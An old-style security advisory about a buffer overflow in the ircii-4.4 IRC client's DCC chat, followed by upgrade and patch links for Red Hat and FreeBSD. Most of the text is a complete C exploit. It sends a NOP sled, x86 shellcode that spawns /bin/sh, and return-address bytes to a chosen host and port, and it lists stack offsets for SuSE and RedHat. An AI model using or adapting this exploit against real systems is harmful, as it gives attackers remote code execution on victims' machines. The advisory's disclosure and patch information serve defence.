COMMAND

    ircii

SYSTEMS AFFECTED

    ircii-4.4

PROBLEM

    'bladi' posted following. This buffer overflow in ircii dcc chat's
    allow to excute arbitrary.

    /*

      ircii-4.4 exploit by bladi & aLmUDeNa

      buffer overflow in ircii dcc chat's
      allow to excute arbitrary

      Affected:
               ircII-4.4

      Patch:
             Upgrade to ircII-4.4M
      ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz

      Offset:
             SuSe 6.x :0xbfffe3ff
             RedHat   :0xbfffe888

      Thanks to : #warinhell,#hacker_novatos
      Special thanks go to: Topo[lb],
	    Saludos para todos los que nos conozcan especialmente para eva ;)
                                             (bladi@euskalnet.net)
    */

    #include <stdio.h>
    #include <netdb.h>
    #include <string.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    char *h_to_ip(char *hostname);
    char *h_to_ip(char *hostname) {
      struct hostent *hozt;
      struct sockaddr_in tmp;
      struct in_addr in;
      if ((hozt=gethostbyname(hostname))==NULL)
          {
          printf(" ERROR: IP incorrecta\n");
          exit(0);
          }
      memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
      memcpy(&in,&tmp.sin_addr.s_addr,4);
      return(inet_ntoa(in));
    }
    main(int argc, char *argv[])
    {
      struct sockaddr_in sin;
      char *hostname;
      char nops[] =
      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
      char *shell =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      int outsocket,tnt,i;
    printf (" irciismash  ver: 1.0\n");
    printf ("         by         \n");
    printf ("  bladi & aLmUDeNa\n\n");

    if (argc<3)
        {
        printf("Usage : %s hostname port\n",argv[0]);
        exit(-1);
        }
    hostname=argv[1];
    outsocket=socket(AF_INET,SOCK_STREAM,0);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(atoi(argv[2]));
    sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
    if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
    printf(" ERROR: El puerto esta cerradito :_(\n");
    exit(0);
    }
        printf("[1]- Noping\n    [");
        for(i=0;i<47;i++)
            {
            if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
            write(outsocket,nops,strlen(nops));
            }
        printf("]\n");
        printf("     Noped\n");
        printf("[2]- Injectin shellcode\n");
        write(outsocket,shell,strlen(shell));
        usleep(999);
        printf("     Injected\n");
        printf("[3]- Waiting\n [");
        for(i=0;i<299;i++)
            {
            printf(".");
            fflush(stdout);
            usleep(99);
            write(outsocket,"\xff",strlen("\xff"));
            write(outsocket,"\xbf",strlen("\xff"));
            write(outsocket,"\xff",strlen("\xe9"));
            write(outsocket,"\xe3",strlen("\xff"));
            }
    printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
    close(outsocket);
    }

SOLUTION

    Upgrade to ircII-4.4M

        ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz

    Derek Callaway brought attention  to this same vulnerability  back
    in June  of 1997.   It's a  shame the  problem still  exists.  For
    RedHat:

    Red Hat Linux 4.2
    =================
        intel: ftp://updates.redhat.com/4.2/i386/ircii-4.4M-0.4.2.i386.rpm
        alpha: ftp://updates.redhat.com/4.2/alpha/ircii-4.4M-0.4.2.alpha.rpm
        sparc: ftp://updates.redhat.com/4.2/sparc/ircii-4.4M-0.4.2.sparc.rpm
        sources: ftp://updates.redhat.com/4.2/SRPMS/ircii-4.4M-0.4.2.src.rpm

    Red Hat Linux 5.2:
    ==================
        intel: ftp://updates.redhat.com/5.2/i386/ircii-4.4M-0.5.2.i386.rpm
        alpha: ftp://updates.redhat.com/5.2/alpha/ircii-4.4M-0.5.2.alpha.rpm
        sparc: ftp://updates.redhat.com/5.2/sparc/ircii-4.4M-0.5.2.sparc.rpm
        sources: ftp://updates.redhat.com/5.2/SRPMS/ircii-4.4M-0.5.2.src.rpm

    Red Hat Linux 6.2:
    ==================
        intel: ftp://updates.redhat.com/6.2/i386/ircii-4.4M-1.i386.rpm
        sparc: ftp://updates.redhat.com/6.2/sparc/ircii-4.4M-1.sparc.rpm
        sources: ftp://updates.redhat.com/6.2/SRPMS/ircii-4.4M-1.src.rpm

    For FreeBSD:

        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/ircII-4.4S.tgz